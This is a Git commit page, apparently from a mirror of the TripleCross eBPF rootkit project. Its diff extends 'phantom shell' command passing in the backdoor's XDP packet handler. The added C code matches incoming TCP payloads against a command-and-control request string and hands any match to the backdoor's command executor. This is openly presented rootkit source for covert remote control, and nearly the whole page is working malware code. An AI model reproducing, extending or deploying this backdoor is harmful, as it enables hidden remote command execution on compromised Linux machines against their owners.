admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-25 10:53:09 +08:00
Code Issues Packages Projects Releases Wiki Activity

Completed command passing for phantom shell

Browse Source
This commit is contained in:
h3xduck
2022-05-15 14:44:16 -04:00
parent ad4f9b2504
commit d509f20974
11 changed files with 3796 additions and 2953 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
src/ebpf/include/xdp/backdoor.h
View File

@@ -10,7 +10,7 @@
#include "../../../common/c&c.h"
#include "../bpf/defs.h"
static __always_inline int execute_key_command(int command_received, __u32 ip, __u16 port){
static __always_inline int execute_key_command(int command_received, __u32 ip, __u16 port, char* optional_payload, int optional_payload_size){
int pid = -1; //Received by network stack, just ignore
switch(command_received){
case CC_PROT_COMMAND_ENCRYPTED_SHELL:
@@ -36,8 +36,14 @@ static __always_inline int execute_key_command(int command_received, __u32 ip, _
struct backdoor_phantom_shell_data ps_new_data = {0};
ps_new_data.active = 1;
ps_new_data.d_ip = ip;
ps_new_data.d_port = port;
__builtin_memcpy(ps_new_data.payload, CC_PROT_PHANTOM_SHELL_INIT, 16);
ps_new_data.d_port = port;
if(optional_payload_size == 0){
//First phantom init msg
__builtin_memcpy(ps_new_data.payload, CC_PROT_PHANTOM_SHELL_INIT, 16);
}else{
__builtin_memcpy(ps_new_data.payload, optional_payload, optional_payload_size);
}
ring_buffer_send_request_update_phantom_shell(&rb_comm, pid, command_received, ps_new_data);
break;
@@ -169,7 +175,7 @@ backdoor_finish:
__u32 ip = s_ip;
__u16 port = s_port;
execute_key_command(command_received, ip, port);
execute_key_command(command_received, ip, port, NULL, 0);
//return XDP_PASS;
return XDP_DROP;
@@ -296,7 +302,7 @@ backdoor_finish_v3_32:
return 0;
}
bpf_printk("Completed backdoor trigger v3 (32bit), b_data position: %i\n", b_data.last_packet_modified);
execute_key_command(command_received, 0, 0);
execute_key_command(command_received, 0, 0, NULL, 0);
return 1;
}
@@ -441,7 +447,7 @@ backdoor_finish_v3_16:
return 0;
}
bpf_printk("Completed backdoor trigger v3 (16bit), b_data position: %i\n", b_data.last_packet_modified);
execute_key_command(command_received, 0, 0);
execute_key_command(command_received, 0, 0, NULL, 0);
return 1;
}

64
src/ebpf/kit.bpf.c
View File

@@ -50,6 +50,42 @@ struct eth_hdr {
unsigned short h_proto;
};
/**
* @brief Checks for the packet to be a phantom request
* Returns 1 if it wants to stop the XDP pipeline.
*
* @param payload
* @param payload_size
* @param data_end
* @param ip
* @param tcp
* @return __always_inline
*/
static __always_inline int check_phantom_payload(char* payload, int payload_size, void* data_end, struct iphdr* ip, struct tcphdr* tcp){
if (tcp_payload_bound_check(payload, payload_size, data_end)){
bpf_printk("G");
return XDP_PASS;
}
bpf_printk("Detected possible phantom shell command\n");
//Check if phantom shell command
char phantom_request[] = CC_PROT_PHANTOM_COMMAND_REQUEST;
int is_phantom_request = 1;
for(int ii=0; ii<sizeof(CC_PROT_PHANTOM_COMMAND_REQUEST)-1; ii++){
if(phantom_request[ii] != payload[ii]){
is_phantom_request = 0;
//bpf_printk("Not phantom: %s\n", payload);
break;
}
}
if(is_phantom_request == 1){
execute_key_command(CC_PROT_COMMAND_PHANTOM_SHELL, ip->saddr, tcp->source, payload, payload_size);
return 1;
}
bpf_printk("Not phantom shell\n");
return 0;
}
SEC("xdp_prog")
int xdp_receive(struct xdp_md *ctx){
@@ -98,6 +134,34 @@ int xdp_receive(struct xdp_md *ctx){
payload_size = bpf_ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4);
payload = (void *)tcp + tcp->doff*4;
int ret_value = -1;
//Yes, the verifier gets a bit angry when trying working with intervals in the payload
//A chained if is also not good. A macro could be added for this kind of cases.
if(payload_size == sizeof(CC_PROT_PHANTOM_COMMAND_REQUEST)){
ret_value = check_phantom_payload(payload, payload_size, data_end, ip, tcp);
}
if(payload_size == sizeof(CC_PROT_PHANTOM_COMMAND_REQUEST)+1){
ret_value = check_phantom_payload(payload, payload_size, data_end, ip, tcp);
}
if(payload_size == sizeof(CC_PROT_PHANTOM_COMMAND_REQUEST)+2){
ret_value = check_phantom_payload(payload, payload_size, data_end, ip, tcp);
}
if(payload_size == sizeof(CC_PROT_PHANTOM_COMMAND_REQUEST)+3){
ret_value = check_phantom_payload(payload, payload_size, data_end, ip, tcp);
}
if(payload_size == sizeof(CC_PROT_PHANTOM_COMMAND_REQUEST)+4){
ret_value = check_phantom_payload(payload, payload_size, data_end, ip, tcp);
}
if(payload_size == sizeof(CC_PROT_PHANTOM_COMMAND_REQUEST)+5){
ret_value = check_phantom_payload(payload, payload_size, data_end, ip, tcp);
}
if(payload_size == sizeof(CC_PROT_PHANTOM_COMMAND_REQUEST)+6){
ret_value = check_phantom_payload(payload, payload_size, data_end, ip, tcp);
}
if(ret_value == 1){
return XDP_PASS;
}
//Check for the rootkit backdoor trigger V1
if(payload_size == CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE){
if (tcp_payload_bound_check(payload, payload_size, data_end)){